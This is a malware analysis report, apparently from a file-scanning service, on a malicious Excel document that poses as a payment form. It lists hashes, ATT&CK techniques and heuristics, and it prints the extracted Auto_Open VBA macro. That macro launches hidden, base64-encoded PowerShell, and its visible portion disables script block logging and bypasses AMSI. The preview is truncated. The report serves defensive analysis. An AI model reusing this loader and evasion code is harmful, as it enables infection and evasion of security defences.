Office (OOXML) malware analysis — malicious · 0b83e79ea0ae7e17

MALICIOUS

Office (OOXML)

61.6 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-18

MD5: 4a31be5d95d7c3bf8bbba513ac9a1096 SHA-1: 3f7274a9c1a7cbed02360cc3d1edf81ef2f5c8a0 SHA-256: 0b83e79ea0ae7e174e7e3d1376d83b7f04c2e3d23df211165c09bcc2db1ad6a9

320 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

This malicious Excel document contains an Auto_Open VBA macro that executes a PowerShell command. The PowerShell command is heavily obfuscated but appears to download and execute a second-stage payload. The document body presents a fake form requesting sensitive payment details, indicating a phishing or scam attempt.

Heuristics 7

VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	8939 bytes
SHA-256: `12ba3d6bc8b739e852532689dd2bea9e7eb567f32e5cb9d938af440179212e4a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Auto_Open() F End Sub Public Function F() As Variant Dim vKBjoV As String vKBjoV = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg" vKBjoV = vKBjoV + "BFAHIAcwBpAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAFIAUwBp" vKBjoV = vKBjoV + "AE8ATgAuAE0AYQBqAE8AUgAgAC0AZwBlACAAMwApAHsAJAAwAD" vKBjoV = vKBjoV + "AAMQA9AFsAUgBFAGYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcA" vKBjoV = vKBjoV + "ZQBUAFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ" vKBjoV = vKBjoV + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV" vKBjoV = vKBjoV + "AHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkAZQBgAEwAZAAiAC" vKBjoV = vKBjoV + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA" vKBjoV = vKBjoV + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ" vKBjoV = vKBjoV + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAAw" vKBjoV = vKBjoV + "ADAAMQApAHsAJAAwADYAYgA9ACQAMAAwADEALgBHAGUAdABWAE" vKBjoV = vKBjoV + "EAbAB1AGUAKAAkAG4AVQBsAEwAKQA7AEkAZgAoACQAMAA2AGIA" vKBjoV = vKBjoV + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw" vKBjoV = vKBjoV + "BnAGkAbgBnACcAXQApAHsAJAAwADYAQgBbACcAUwBjAHIAaQBw" vKBjoV = vKBjoV + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF" vKBjoV = vKBjoV + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA" vKBjoV = vKBjoV + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAwADYAQg" vKBjoV = vKBjoV + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn" vKBjoV = vKBjoV + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH" vKBjoV = vKBjoV + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A" vKBjoV = vKBjoV + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATA" vKBjoV = vKBjoV + "BsAGUAQwBUAEkATwBuAHMALgBHAGUATgBlAHIAaQBDAC4ARABJ" vKBjoV = vKBjoV + "AEMAdABJAE8AbgBhAHIAWQBbAHMAdAByAEkAbgBHACwAUwB5AF" vKBjoV = vKBjoV + "MAVABFAG0ALgBPAGIAagBlAGMAdABdAF0AOgA6AG4AZQBXACgA" vKBjoV = vKBjoV + "KQA7ACQAdgBhAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUw" vKBjoV = vKBjoV + "BjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBu" vKBjoV = vKBjoV + "AGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAG" vKBjoV = vKBjoV + "EAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8A" vKBjoV = vKBjoV + "YwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJA" vKBjoV = vKBjoV + "AwADYAYgBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBD" vKBjoV = vKBjoV + "AEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAG" vKBjoV = vKBjoV + "MAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQA" vKBjoV = vKBjoV + "bwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQ" vKBjoV = vKBjoV + "BwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBd" vKBjoV = vKBjoV + "AD0AJABWAEEAbAB9AEUATABTAEUAewBbAFMAYwByAGkAUAB0AE" vKBjoV = vKBjoV + "IATABPAEMASwBdAC4AIgBHAGUAVABGAEkARQBgAEwARAAiACgA" vKBjoV = vKBjoV + "JwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbw" vKBjoV = vKBjoV + "BuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBF" vKBjoV = vKBjoV + "AHQAVgBhAGwAVQBlACgAJABOAHUAbABsACwAKABOAGUAdwAtAE" vKBjoV = vKBjoV + "8AQgBqAGUAYwB0ACAAQwBPAEwAbABFAGMAdABJAG8AbgBzAC4A" vKBjoV = vKBjoV + "RwBlAG4AZQByAGkAQwAuAEgAQQBTAEgAUwBlAFQAWwBTAFQAUg" vKBjoV = vKBjoV + "BJAG4AZwBdACkAKQB9ACQAUgBlAGYAPQBbAFIAZQBmAF0ALgBB" vKBjoV = vKBjoV + "AHMAcwBFAE0AYgBsAHkALgBHAEUAVABUAFkAUABlACgAJwBTAH" vKBjoV = vKBjoV + "kAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUA" vKBjoV = vKBjoV + "dABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQ" vKBjoV = vKBjoV + "BsAHMAJwApADsAJABSAEUAZgAuAEcARQBUAEYAaQBlAEwAZAAo" vKBjoV = vKBjoV + "ACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkAC" vKBjoV = vKBjoV + "cALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMA" vKBjoV = vKBjoV + "JwApAC4AUwBlAHQAVgBhAEwAVQBFACgAJABuAHUAbABMACwAJA" vKBjoV = vKBjoV + "BUAFIAVQBFACkAOwB9ADsAWwBT ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	26112 bytes
SHA-256: `91a1dca372d87e32aa8339c3069d55239ea58d34e66c15f3a50f4b399fb26492`

Open this report in the interactive analyzer, or submit your own file for analysis.